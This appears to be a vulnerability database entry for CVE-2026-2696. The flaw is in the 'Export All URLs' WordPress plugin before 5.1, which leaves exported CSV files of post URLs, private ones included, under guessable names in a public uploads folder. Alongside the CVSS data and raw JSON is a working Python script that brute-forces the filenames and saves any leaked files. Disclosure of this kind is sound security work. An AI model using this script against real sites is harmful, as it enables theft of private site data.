Security Vulnerability Report
中文
CVE-2026-2696 CVSS 5.3 MEDIUM

CVE-2026-2696

Published: 2026-04-01 06:16:15
Last Modified: 2026-04-15 15:05:48

Description

The Export All URLs WordPress plugin before 5.1 generates CSV filenames containing posts URLS (including private posts) in a predictable pattern using a random 6-digit number. These files are stored in the publicly accessible wp-content/uploads/ directory. As a result, any unauthenticated user can brute-force the filenames to gain access to sensitive data contained within the exported files.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Export All URLs < 5.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_domain = "http://example.com" base_url = f"{target_domain}/wp-content/uploads/export_all_urls_{{}}.csv" print(f"[*] Starting brute force for {target_domain}") # Iterate through all 6-digit combinations (000000 to 999999) for i in range(1000000): # Format the number with leading zeros, e.g., 000001 random_num = f"{i:06d}" url = base_url.format(random_num) try: response = requests.get(url, timeout=1) if response.status_code == 200: print(f"[+] Found valid file: {url}") # Save the downloaded file with open(f"leaked_{random_num}.csv", "wb") as f: f.write(response.content) # Optional: exit after finding one, or continue to find all # break except requests.RequestException: continue print("[*] Scan complete.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2696", "sourceIdentifier": "[email protected]", "published": "2026-04-01T06:16:15.380", "lastModified": "2026-04-15T15:05:47.827", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Export All URLs WordPress plugin before 5.1 generates CSV filenames containing posts URLS (including private posts) in a predictable pattern using a random 6-digit number. These files are stored in the publicly accessible wp-content/uploads/ directory. As a result, any unauthenticated user can brute-force the filenames to gain access to sensitive data contained within the exported files."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://wpscan.com/vulnerability/55d627c1-ad05-4cd1-ae7b-932d84c19313/", "source": "[email protected]"}]}}